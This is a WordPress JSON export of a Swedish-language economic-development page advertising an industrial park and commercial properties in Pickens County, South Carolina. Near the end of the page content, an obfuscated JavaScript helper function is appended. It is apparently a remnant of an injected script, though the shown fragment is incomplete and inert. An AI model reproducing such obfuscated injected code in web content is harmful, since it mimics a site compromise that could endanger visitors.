{"id":8670,"date":"2020-10-28T16:08:30","date_gmt":"2020-10-28T16:08:30","guid":{"rendered":"http:\/\/alliancepickens.com\/webbplatser-byggnader\/"},"modified":"2020-12-09T20:36:47","modified_gmt":"2020-12-09T20:36:47","slug":"webbplatser-byggnader","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/sv\/webbplatser-byggnader\/","title":{"rendered":"Webbplatser &amp; Byggnader"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;]\n\t\t\t<!-- START Alliance Pickens Property GFX REVOLUTION SLIDER 6.4.6 --><p class=\"rs-p-wp-fix\"><\/p>\n\t\t\t<rs-module-wrap id=\"rev_slider_3_1_wrapper\" data-source=\"gallery\" style=\"background:#FFFFFF;padding:0;margin:0px auto;margin-top:0;margin-bottom:0;max-width:;\">\n\t\t\t\t<rs-module id=\"rev_slider_3_1\" style=\"\" data-version=\"6.4.6\">\n\t\t\t\t\t<rs-slides>\n\t\t\t\t\t\t<rs-slide data-key=\"rs-11\" data-title=\"Seven Company\" data-duration=\"9700\" data-anim=\"ms:800ms;r:0;\" data-in=\"o:0;e:power1.inOut;\" data-out=\"e:power1.inOut;\" data-p1=\"B2B Services\" data-p3=\"View\">\n\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" src=\"\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/bg-placeholder.jpg\" alt=\"Mountain View\" title=\"Mountain View 5\" width=\"1920\" height=\"753\" class=\"rev-slidebg tp-rs-img\" data-no-retina>\n\t\t\t\t\t\t\t<rs-bgvideo \n\t\t\t\t\t\t\t\tdata-video=\"w:100%;h:100%;nse:false;l:true;ptimer:false;vfc:true;\"\n\t\t\t\t\t\t\t\tdata-mp4=\"\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/propertysearch-small.mp4\"\n\t\t\t\t\t\t\t><\/rs-bgvideo>\n<!--\n\t\t\t\t\t\t\t--><a\n\t\t\t\t\t\t\t\tid=\"slider-3-slide-11-layer-2\" \n\t\t\t\t\t\t\t\tclass=\"rs-layer rev-btn\"\n\t\t\t\t\t\t\t\thref=\"https:\/\/alliancepickens.giswebtechrecruit.com\/?sorting=featured%20desc,%20name%20asc&showpropertyonmap=true&mapextent=-9384113.706503402,4058819.237230376,-9030363.139599778,4227592.195683964\" target=\"_blank\" rel=\"nofollow noopener\"\n\t\t\t\t\t\t\t\tdata-type=\"button\"\n\t\t\t\t\t\t\t\tdata-rsp_ch=\"on\"\n\t\t\t\t\t\t\t\tdata-xy=\"xo:542px,745px,609px,338px;yo:182px,250px,204px,113px;\"\n\t\t\t\t\t\t\t\tdata-text=\"w:normal;s:32,44,36,20;l:50,68,55,30;fw:700;\"\n\t\t\t\t\t\t\t\tdata-dim=\"minh:0px,none,none,none;\"\n\t\t\t\t\t\t\t\tdata-padding=\"r:20,28,23,13;l:20,28,23,13;\"\n\t\t\t\t\t\t\t\tdata-frame_999=\"o:0;st:w;\"\n\t\t\t\t\t\t\t\tdata-frame_hover=\"bgc:#1d2e66;bor:0px,0px,0px,0px;sp:200;e:power1.inOut;\"\n\t\t\t\t\t\t\t\tstyle=\"z-index:8;background-color:#65c8ae;font-family:Open Sans;\"\n\t\t\t\t\t\t\t>Search Now \n\t\t\t\t\t\t\t<\/a><!--\n\n\t\t\t\t\t\t\t--><rs-layer\n\t\t\t\t\t\t\t\tid=\"slider-3-slide-11-layer-3\" \n\t\t\t\t\t\t\t\tdata-type=\"text\"\n\t\t\t\t\t\t\t\tdata-color=\"#1d2e66\"\n\t\t\t\t\t\t\t\tdata-rsp_ch=\"on\"\n\t\t\t\t\t\t\t\tdata-xy=\"xo:48px,66px,54px,30px;yo:43px,59px,48px,26px;\"\n\t\t\t\t\t\t\t\tdata-text=\"w:normal;s:24,33,27,15;l:25,34,27,15;ls:1px,1px,0px,0px;fw:600;\"\n\t\t\t\t\t\t\t\tdata-frame_999=\"o:0;st:w;\"\n\t\t\t\t\t\t\t\tstyle=\"z-index:12;font-family:Open Sans;text-transform:uppercase;\"\n\t\t\t\t\t\t\t>Property Search \n\t\t\t\t\t\t\t<\/rs-layer><!--\n\n\t\t\t\t\t\t\t--><rs-layer\n\t\t\t\t\t\t\t\tid=\"slider-3-slide-11-layer-4\" \n\t\t\t\t\t\t\t\tdata-type=\"shape\"\n\t\t\t\t\t\t\t\tdata-rsp_ch=\"on\"\n\t\t\t\t\t\t\t\tdata-xy=\"xo:26px,35px,28px,15px;yo:35px,48px,39px,21px;\"\n\t\t\t\t\t\t\t\tdata-text=\"w:normal;s:20,27,22,12;l:0,34,27,15;\"\n\t\t\t\t\t\t\t\tdata-dim=\"w:298px,409px,334px,185px;h:40px,55px,45px,25px;\"\n\t\t\t\t\t\t\t\tdata-frame_999=\"o:0;st:w;\"\n\t\t\t\t\t\t\t\tstyle=\"z-index:11;background-color:#ffffff;\"\n\t\t\t\t\t\t\t> \n\t\t\t\t\t\t\t<\/rs-layer><!--\n\n\t\t\t\t\t\t\t--><rs-layer\n\t\t\t\t\t\t\t\tid=\"slider-3-slide-11-layer-5\" \n\t\t\t\t\t\t\t\tdata-type=\"shape\"\n\t\t\t\t\t\t\t\tdata-rsp_ch=\"on\"\n\t\t\t\t\t\t\t\tdata-xy=\"xo:26px,35px,28px,15px;yo:46px,63px,51px,28px;\"\n\t\t\t\t\t\t\t\tdata-text=\"w:normal;s:20,27,22,12;l:0,34,27,15;\"\n\t\t\t\t\t\t\t\tdata-dim=\"w:305px,419px,342px,190px;h:36px,49px,40px,22px;\"\n\t\t\t\t\t\t\t\tdata-frame_999=\"o:0;st:w;\"\n\t\t\t\t\t\t\t\tstyle=\"z-index:10;background-color:#e8e8e8;\"\n\t\t\t\t\t\t\t> \n\t\t\t\t\t\t\t<\/rs-layer><!--\n\n\t\t\t\t\t\t\t--><rs-layer\n\t\t\t\t\t\t\t\tid=\"slider-3-slide-11-layer-6\" \n\t\t\t\t\t\t\t\tdata-type=\"shape\"\n\t\t\t\t\t\t\t\tdata-rsp_ch=\"on\"\n\t\t\t\t\t\t\t\tdata-xy=\"xo:26px,35px,28px,15px;yo:54px,74px,60px,33px;\"\n\t\t\t\t\t\t\t\tdata-text=\"w:normal;s:20,27,22,12;l:0,34,27,15;\"\n\t\t\t\t\t\t\t\tdata-dim=\"w:281px,386px,315px,175px;h:36px,49px,40px,22px;\"\n\t\t\t\t\t\t\t\tdata-frame_999=\"o:0;st:w;\"\n\t\t\t\t\t\t\t\tstyle=\"z-index:9;background-color:rgba(3,121,91,0.8);\"\n\t\t\t\t\t\t\t> \n\t\t\t\t\t\t\t<\/rs-layer><!--\n\n\t\t\t\t\t\t\t--><rs-layer\n\t\t\t\t\t\t\t\tid=\"slider-3-slide-11-layer-7\" \n\t\t\t\t\t\t\t\tdata-type=\"shape\"\n\t\t\t\t\t\t\t\tdata-rsp_ch=\"on\"\n\t\t\t\t\t\t\t\tdata-xy=\"xo:184px,253px,207px,115px;yo:68px,93px,76px,42px;\"\n\t\t\t\t\t\t\t\tdata-text=\"w:normal;s:20,27,22,12;l:0,34,27,15;\"\n\t\t\t\t\t\t\t\tdata-dim=\"w:100px,137px,112px,62px;h:2px,2px,1px,1px;\"\n\t\t\t\t\t\t\t\tdata-frame_999=\"o:0;st:w;\"\n\t\t\t\t\t\t\t\tstyle=\"z-index:13;background-color:#5dc9ae;\"\n\t\t\t\t\t\t\t> \n\t\t\t\t\t\t\t<\/rs-layer><!--\n-->\t\t\t\t\t\t<\/rs-slide>\n\t\t\t\t\t<\/rs-slides>\n\t\t\t\t\t<rs-static-layers><!--\n\t\t\t\t\t--><\/rs-static-layers>\n\t\t\t\t<\/rs-module>\n\t\t\t\t<script type=\"text\/javascript\">\n\t\t\t\t\tsetREVStartSize({c: 'rev_slider_3_1',rl:[1240,1024,778,480],el:[250,700,700,800],gw:[800,1100,900,500],gh:[250,508,415,231],type:'standard',justify:'',layout:'fullwidth',mh:\"0\"});\n\t\t\t\t\tvar\trevapi3,\n\t\t\t\t\t\ttpj;\n\t\t\t\t\tfunction revinit_revslider31() {\n\t\t\t\t\tjQuery(function() {\n\t\t\t\t\t\ttpj = jQuery;\n\t\t\t\t\t\trevapi3 = tpj(\"#rev_slider_3_1\");\n\t\t\t\t\t\tif(revapi3==undefined || revapi3.revolution == undefined){\n\t\t\t\t\t\t\trevslider_showDoubleJqueryError(\"rev_slider_3_1\");\n\t\t\t\t\t\t}else{\n\t\t\t\t\t\t\trevapi3.revolution({\n\t\t\t\t\t\t\t\tvisibilityLevels:\"1240,1024,778,480\",\n\t\t\t\t\t\t\t\tgridwidth:\"800,1100,900,500\",\n\t\t\t\t\t\t\t\tgridheight:\"250,508,415,231\",\n\t\t\t\t\t\t\t\tspinner:\"spinner4\",\n\t\t\t\t\t\t\t\tperspective:600,\n\t\t\t\t\t\t\t\tperspectiveType:\"local\",\n\t\t\t\t\t\t\t\teditorheight:\"250,700,700,800\",\n\t\t\t\t\t\t\t\tresponsiveLevels:\"1240,1024,778,480\",\n\t\t\t\t\t\t\t\tprogressBar:{disableProgressBar:true},\n\t\t\t\t\t\t\t\tnavigation: {\n\t\t\t\t\t\t\t\t\tonHoverStop:false\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\tfallbacks: {\n\t\t\t\t\t\t\t\t\tallowHTML5AutoPlayOnAndroid:true\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t});\n\t\t\t\t\t\t}\n\t\t\t\t\t\t\n\t\t\t\t\t});\n\t\t\t\t\t} \/\/ End of RevInitScript\n\t\t\t\tvar once_revslider31 = false;\n\t\t\t\tif (document.readyState === \"loading\") {document.addEventListener('readystatechange',function() { if((document.readyState === \"interactive\" || document.readyState === \"complete\") && !once_revslider31 ) { once_revslider31 = true; revinit_revslider31();}});} else {once_revslider31 = true; revinit_revslider31();}\n\t\t\t\t<\/script>\n\t\t\t\t<script>\n\t\t\t\t\tvar htmlDivCss = unescape(\"%23rev_slider_3_1_wrapper%20rs-loader.spinner4%20div%20%7B%20background-color%3A%20%23ffffff%20%21important%3B%20%7D\");\n\t\t\t\t\tvar htmlDiv = document.getElementById('rs-plugin-settings-inline-css');\n\t\t\t\t\tif(htmlDiv) {\n\t\t\t\t\t\thtmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss;\n\t\t\t\t\t}else{\n\t\t\t\t\t\tvar htmlDiv = document.createElement('div');\n\t\t\t\t\t\thtmlDiv.innerHTML = '<style>' + htmlDivCss + '<\/style>';\n\t\t\t\t\t\tdocument.getElementsByTagName('head')[0].appendChild(htmlDiv.childNodes[0]);\n\t\t\t\t\t}\n\t\t\t\t<\/script>\n\t\t\t<\/rs-module-wrap>\n\t\t\t<!-- END REVOLUTION SLIDER -->\n[\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;I det h\u00e4r avsnittet&#8221; nav_menu=&#8221;19&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; el_id=&#8221;industrial_parks&#8221;][vc_column][vc_column_text]<\/p>\n<h2>Industriparker<\/h2>\n<p>[\/vc_column_text][vc_empty_space][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;9817&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;2\/3&#8243;][vc_column_text]Pickens County Commerce Park \u00e4r en 310 hektar stor klass A Industrial Park med 6000 meter av fr\u00e4msta frontage p\u00e5 fyrfilig US Highway 123. Den Pickens County Commerce Park har en komplett nytta infrastruktur som omfattar 2 elleverant\u00f6rer, en dedikerad fiber switch, gott om avloppsvatten kapacitet, vattenkapacitet och en 1 miljon liter vatten lagringstank som \u00e4r avsedd f\u00f6r anv\u00e4ndning av Commerce Park anl\u00e4ggningar.[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][vc_column_text]<\/p>\n<h3><\/h3>\n<h3 style=\"text-align: center\">F\u00f6retag i Pickens County Commerce Park Inkluderar:<\/h3>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Abbott<\/li>\n<li>era-kontakta USA<\/li>\n<li>IPSUM-tekniker<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Teknik f\u00f6r JR-automatisering<\/li>\n<li>KeyMark, Inc.<\/li>\n<li>P\u00e5litlig Automatisk Sprinkler Company<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Safeplast USA<\/li>\n<li>Taylormade<\/li>\n<li>United Verktyg och m\u00f6gel<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][\/vc_row_inner][vc_column_text]<\/p>\n<h3 style=\"text-align: center\"><\/h3>\n<h3 style=\"text-align: center\">Pickens County Commerce Park funktioner inkluderar:<\/h3>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Klass A Industripark<\/li>\n<li>Skyddsf\u00f6rbund p\u00e5 plats | <a href=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/PCCP-Protective-Covenenants-1.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">L\u00e4s mer<\/a><\/li>\n<li>Tv\u00e5 elektriska transformatorstationer och tv\u00e5 elleverant\u00f6rer<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Digital fiber switch p\u00e5 lokaler<\/li>\n<li>Robust infrastruktur p\u00e5 plats<\/li>\n<li>\u00d6ver 1,1 miljoner kvadratmeter byggnadskonstruktion<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Campus-liknande milj\u00f6<\/li>\n<li>Mellan Charlotte, NC och Atlanta, GA<\/li>\n<li>En plats som \u00e5terst\u00e5r<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][\/vc_row_inner][vc_column_text el_class=&#8221;fullbtn&#8221;]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/sv\/webbplatser-byggnader\/pickens-county-commerce-park\/\">L\u00e4s mer om Pickens County Commerce Park<\/a>[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;4765&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row el_id=&#8221;industrial_sites&#8221;][vc_column][vc_column_text]<\/p>\n<h2>Industriomr\u00e5den<\/h2>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]Alliance Pickens ger platsval st\u00f6d f\u00f6r f\u00f6retag som \u00f6verv\u00e4ger Pickens County.South Carolina.USA. f\u00f6r sitt expansions- eller omlokaliseringsprojekt. Alliance Pickens-teamet tillhandah\u00e5ller en rad viktiga tj\u00e4nster, inklusive att identifiera potentiella webbplatser, samordna turer, g\u00f6ra konfidentiella f\u00f6rfr\u00e5gningar, anpassa strategier f\u00f6r utveckling av arbetskraften och fungera som en f\u00f6rbindelse med myndigheter och det lokala n\u00e4ringslivet.<\/p>\n<p>Alliance Pickens arbetar rutinm\u00e4ssigt med f\u00f6retagsledare, webbplatsvalskonsulter och andra parter som \u00e4r involverade i platsvalsprocessen f\u00f6r att s\u00e4kerst\u00e4lla ett samarbete som beaktar b\u00e5de de omedelbara och l\u00e5ngsiktiga behoven i din organisation.<\/p>\n<p>F\u00f6retagets krav som att bygga p\u00e5 plats, infrastruktur, tillg\u00e5ng till fiber och andra aff\u00e4rsprioriteringar anv\u00e4nds f\u00f6r att hitta den plats som hj\u00e4lper ditt projekt att lyckas.[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<span style=\"font-size: 12px\">V\u00e4nligen visa de tillg\u00e4ngliga webbplatser som anges nedan <a href=\"http:\/\/alliancepickens.com\/sv\/om-oss\/#contact\">och kontakta oss<\/a> f\u00f6r ytterligare hj\u00e4lp.<\/span>[\/vc_column_text][vc_column_text]<div>Attention: The internal data of table \u201c8\u201d is corrupted!<\/div>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;4915&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row el_id=&#8221;industrial_buildings&#8221;][vc_column][vc_column_text]<\/p>\n<h2>Industribyggnader<\/h2>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<span style=\"font-weight: 400\">Den Alliance Pickens personal \u00e4r glada att tillhandah\u00e5lla omr\u00e5dets urval av industribyggnader till salu eller hyra f\u00f6r att hitta en plats som uppfyller dina aff\u00e4rsbehov. Kontakta oss g\u00e4rna f\u00f6r information om ditt f\u00f6retags relaterade behov, fr\u00e5n att till\u00e5ta oro till personaltillg\u00e5ng, f\u00f6r att underl\u00e4tta urvalsprocessen.<\/span><\/p>\n<p><span style=\"font-weight: 400\">F\u00f6r ytterligare information om dessa eller andra fastigheter, v\u00e4nligen <\/span> <a href=\"http:\/\/alliancepickens.com\/sv\/om-oss\/#contact\"><span style=\"font-weight: 400\">kontakta oss<\/span><\/p>\n<p><\/a> f\u00f6r ytterligare<span style=\"font-weight: 400\"> hj\u00e4lp.<\/span>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<div>Attention: The internal data of table \u201c9\u201d is corrupted!<\/div>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;10703&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row el_id=&#8221;office_buildings&#8221;][vc_column][vc_column_text]<\/p>\n<h2>Kontorsbyggnader<\/h2>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]Alliance Pickens kan hj\u00e4lpa till att expandera eller flytta f\u00f6retag f\u00f6r att identifiera l\u00e4mpliga kommersiella kontorsfastigheter till salu eller uthyrning i Pickens County.South Carolina.USA.<\/p>\n<p>Om du vill veta mer om omr\u00e5destillf\u00e4llen kan du l\u00e4sa v\u00e5r lista \u00f6ver utvalda egenskaper. F\u00f6r ytterligare information om dessa och andra tillg\u00e4ngliga kommersiella kontorsbyggnad fastigheter till salu eller hyra i Pickens County.South Carolina.USA omr\u00e5de, <a href=\"http:\/\/alliancepickens.com\/sv\/om-oss\/#contact\">v\u00e4nligen kontakta Alliance Pickens<\/a>.[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<div>Attention: The internal data of table \u201c10\u201d is corrupted!<\/div>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center\">L\u00e4s mer om webbplatser och byggnader<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;19&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Redo att s\u00e4tta ig\u00e5ng?<\/h1>\n<h3>Vi ser fram emot att f\u00e5 tala med er!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/about-us\/contact-directions\/\">Kontakta v\u00e5rt team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;I det h\u00e4r avsnittet&#8221; nav_menu=&#8221;19&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; el_id=&#8221;industrial_parks&#8221;][vc_column][vc_column_text] Industriparker [\/vc_column_text][vc_empty_space][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;9817&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;2\/3&#8243;][vc_column_text]Pickens County Commerce Park \u00e4r en 310 hektar stor klass A Industrial Park med 6000 meter av fr\u00e4msta frontage p\u00e5 fyrfilig US Highway 123. Den Pickens County Commerce Park har en komplett nytta infrastruktur som omfattar 2&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-8670","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Webbplatser &amp; Byggnader - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/sv\/webbplatser-byggnader\/\" \/>\n<meta property=\"og:locale\" content=\"sv_SE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Webbplatser &amp; Byggnader - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;I det h\u00e4r avsnittet&#8221; nav_menu=&#8221;19&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; el_id=&#8221;industrial_parks&#8221;][vc_column][vc_column_text] Industriparker [\/vc_column_text][vc_empty_space][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;9817&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;2\/3&#8243;][vc_column_text]Pickens County Commerce Park \u00e4r en 310 hektar stor klass A Industrial Park med 6000 meter av fr\u00e4msta frontage p\u00e5 fyrfilig US Highway 123. Den Pickens County Commerce Park har en komplett nytta infrastruktur som omfattar 2&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/sv\/webbplatser-byggnader\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-09T20:36:47+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/webbplatser-byggnader\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/webbplatser-byggnader\\\/\",\"name\":\"Webbplatser &amp; Byggnader - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\"},\"datePublished\":\"2020-10-28T16:08:30+00:00\",\"dateModified\":\"2020-12-09T20:36:47+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/webbplatser-byggnader\\\/#breadcrumb\"},\"inLanguage\":\"sv-SE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/webbplatser-byggnader\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/webbplatser-byggnader\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Webbplatser &amp; Byggnader\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"sv-SE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Webbplatser &amp; Byggnader - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/sv\/webbplatser-byggnader\/","og_locale":"sv_SE","og_type":"article","og_title":"Webbplatser &amp; Byggnader - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;I det h\u00e4r avsnittet&#8221; nav_menu=&#8221;19&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; el_id=&#8221;industrial_parks&#8221;][vc_column][vc_column_text] Industriparker [\/vc_column_text][vc_empty_space][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;9817&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;2\/3&#8243;][vc_column_text]Pickens County Commerce Park \u00e4r en 310 hektar stor klass A Industrial Park med 6000 meter av fr\u00e4msta frontage p\u00e5 fyrfilig US Highway 123. Den Pickens County Commerce Park har en komplett nytta infrastruktur som omfattar 2&hellip;","og_url":"https:\/\/alliancepickens.com\/sv\/webbplatser-byggnader\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-09T20:36:47+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/sv\/webbplatser-byggnader\/","url":"https:\/\/alliancepickens.com\/sv\/webbplatser-byggnader\/","name":"Webbplatser &amp; Byggnader - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/sv\/#website"},"datePublished":"2020-10-28T16:08:30+00:00","dateModified":"2020-12-09T20:36:47+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/sv\/webbplatser-byggnader\/#breadcrumb"},"inLanguage":"sv-SE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/sv\/webbplatser-byggnader\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/sv\/webbplatser-byggnader\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/sv\/"},{"@type":"ListItem","position":2,"name":"Webbplatser &amp; Byggnader"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/sv\/#website","url":"https:\/\/alliancepickens.com\/sv\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens 